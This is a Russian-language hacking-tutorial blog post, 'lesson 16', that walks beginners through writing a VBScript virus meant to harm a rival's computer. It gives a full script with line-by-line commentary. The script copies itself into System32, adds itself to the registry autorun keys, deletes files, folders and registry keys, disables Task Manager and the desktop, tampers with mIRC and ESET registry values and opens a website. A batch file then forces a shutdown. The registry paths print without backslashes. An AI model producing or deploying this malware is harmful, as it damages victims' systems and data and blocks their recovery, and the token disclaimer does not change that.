*ХЕКЕРСТВО* урок 16 вирус vbs
Всем ку. У каждого хакера в определенный момент возникает желание напакостить кому-либо и написать свой собственный вирус, но незнание какого-либо языка делает это невозможным и новичку приходится искать уже готовые продукты. Сегодня я постараюсь помочь новичкам исполнить их мечту с помощью уже готовых функций. Своего рода предоставить им самые основные "детальки", необходимые для сборки вируса. Предупреждаю заранее - данная статья будет полезна лишь новичкам. Надеюсь она поможет им не только почистить комп своего недруга )), но и хоть самую малость изучить язык Visual Basic Script, и, возможно, даже самим написать какой-нибудь скриптик ( к примеру выскакивающее окошко с сообщением о том что комп был атакован сервером компании Apple XP и почистить системные каталоги )). Тем же, кто считает, что вирусы на VBS это детские шалости могу сказать, что у таких вирусов есть преимущества - пишутся они буквально за несколько минут, и имеют очень малый размер (около 10 кб ). Каждую строчку кода я попытаюсь как можно понятнее раскрыть. Итак, поехали.
Создаём файл virus. vbs, открываем блокнот ( в качестве редактора могу порекомендовать notepad++, который можно скачать здесь ) и начинаем писать наш вредоносный скрипт:
Set Shell = CreateObject("Wscript. Shell")
Set Application = CreateObject("Shell. Application")
Set FileSystemObject = CreateObject("scripting. filesystemobject")
Set File = FileSystemObject. GetFile(WScript. ScriptFullName)
On Error Resume Next
File. Copy ("c:windowsSystem32virus. vbs")
Shell. RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunvirus", "C:WINDOWSSYSTEM32virus. vbs"
Shell. RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServicesvirus", "C:WINDOWSSYSTEM32virus. vbs"
Shell. RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunOncevirus", "C:WINDOWSSYSTEM32virus. vbs"
Shell. popup "message",5, "heading", 0+16
FileSystemObject. deletefolder"C:example",True
FileSystemObject. deletefile"C:example. txt",True
Shell. RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisabletaskmgr", 1, "REG_DWORD"
Shell. RegWrite "HKEY_CURRENT_USERSoftwaremIRCLicense", "blabla"
Shell. RegWrite "HKEY_LOCAL_MACHINESOFTWAREESETESET SecurityCurrentVersionInfoEditionName", "hacked by ваш ник ;)))"
Shell. RegDelete "HKEY_CURRENT_USERexample"
Shell. RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDesktop", 1, "REG_DWORD"
Application. MinimizeAll
InternerExplorer. Visible = True
InternerExplorer. Navigate ""
Теперь разберём по порядку каждую строчку:
Set Shell = CreateObject("Wscript. Shell") 'с этого момента начинается VB скрипт
Set Application = CreateObject("Shell. Application") 'разрешаем приложения
Set FileSystemObject = CreateObject("scripting. filesystemobject") 'если в скрипте присутствует код использования ФС (aka файловой системы) то необходимо разрешить эту функцию перед началом ее выполнения
Set File = FileSystemObject. GetFile(WScript. ScriptFullName) 'разрешаем работу с файлами (копирование, перемещение и т. д.)
On Error Resume Next 'очень важная функция - пропуск ошибок (если какого-то файла/папки не окажется то произойдет ошибка в скрипте и все последующие функции не будут выполнены, после этой функции после возникающих ошибок последующие функции будут выполнятся как ни в чем не бывало)
File. Copy ("c:windowsSystem32virus. vbs") 'создаём файл virus. vbs в директории c:windowsSystem32 , который содержит тот же код что и этот (короче данный файл копируется туда)
Shell. RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunvirus", "C:WINDOWSSYSTEM32virus. vbs" 'прописываем только что созданный файл в автозагрузку через реестр в новый строковый параметр "virus" располагающийся здесь - HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun
Shell. RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServicesvirus", "C:WINDOWSSYSTEM32virus. vbs" 'прописываем только что созданный файл в автозагрузку через реестр в новый строковый параметр "virus" располагающийся здесь - HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServices
Shell. RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunOncevirus", "C:WINDOWSSYSTEM32virus. vbs" 'если прописать наш файл только здесь, то вирус после перезагрузки запустится только один раз, но!!! когда он будет запускаться в нем будет присутствовать эта строка, которая снова пропишет его опять таки в эту директорию - и так после каждого ребута он всё равно будет запускаться. (можешь выбрать из всех трёх способов автозагрузки только один, на случай если юзер вдруг случайно наткнется на одну из этих записей в реестре)
Shell. popup "message",5, "heading", 0+16 'выводим сообщение с заголовком "heading" и самим сообщением "message" и 0+16=ошибка(можно заменить на 0+64(значок i), 0+48(значок!), 0+32(значок?) или 0+0(без значка)) и устанавливаем время показа мессаги в 5 сек.(если поставить 0 время показа будет неограниченным) эту сроку можно переместить и в конец скрипта, тогда сообщение будет выводиться после отработки скрипта. Вместо "message" ты можешь подставить любой текст. А что это будет за текст - это уже зависит от твоей фантазии.
FileSystemObject. deletefolder"C:example",True 'удаляем папку example на диске C
FileSystemObject. deletefile"C:example. txt",True 'удаляем файл example. txt на диске C
'изменения реестра (все вкусности которые могут использовать вири, нам не перечислить):
Shell. RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisabletaskmgr", 1, "REG_DWORD" 'отключаем ctrl+alt+del а точнее запрещаем запуск taskmgr aka диспетчер задач windows
Shell. RegWrite "HKEY_CURRENT_USERSoftwaremIRCLicense", "blabla" 'если у юзера зарегана mIRC то можно сделать подляночку - пускай зарегает еще раз:) Для этого меняем серийник на blabla Ты можешь использовать данную функцию для любых других изменений значений реестра, для этого вместо "HKEY_CURRENT_USERSoftwaremIRCLicense" прописываешь путь до интересующего параметра, а вместо "blabla" новое значение.
Shell. RegWrite "HKEY_LOCAL_MACHINESOFTWAREESETESET SecurityCurrentVersionInfoEditionName", "hacked by ваш ник ;)))" 'в главном окне антивируса NOD32 после слов ESET NOD32 Antivirus появится надпись Hacked by "ваш ник" неплохо, да? :)))
Shell. RegDelete "HKEY_CURRENT_USERexample" 'удаляем ветку реестра HKEY_CURRENT_USERexample
'и на последок делаем следующее:
Shell. RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDesktop", 1, "REG_DWORD" 'удаляем все с рабочего стола
Application. MinimizeAll 'свёртываем все окна
InternerExplorer. Visible = True
InternerExplorer. Navigate "" 'переходим на порно сайт чтобы хоть как то успокоить юзера которому теперь не сладко придется.
Так, с .vbs вроде разобрались, а как же юзер который остался наедине с... как бы это сказать по мягче, в общем чтобы он не перевозбудился от всего только что увиденного, ограничим ему время просмотра до 120 секунд (2 минут :)). Для этого создадим файл virus. bat и впишем в него сдедующую команду:
Shutdown - s - f - t 120 - c "chuvak, chtoby ty ne perevozbudilsja, companija MiCrO$ofT ogranichila vremja prosmotra dannogo sajta do 2 minut, posle chego vy otpravytes v rebut"
А чтобы не вылезала некрасивая консоль напишем перед этой командой следующее:
@echo off
Джойним два этих файлика и... в общем это твоё дело для каких целей ты их будешь использовать, но я рекомендую их удалить, так сказать от греха подальше. На последок скажу что статья написана исключительно в ознакомительных целях и не в каких других. В общем не делай глупостей!!! лучше подумай куда бы можно приспособить данные команды чтобы от них польза была. Удачи, юный хацкер. С вами был Андрей Тротсенко!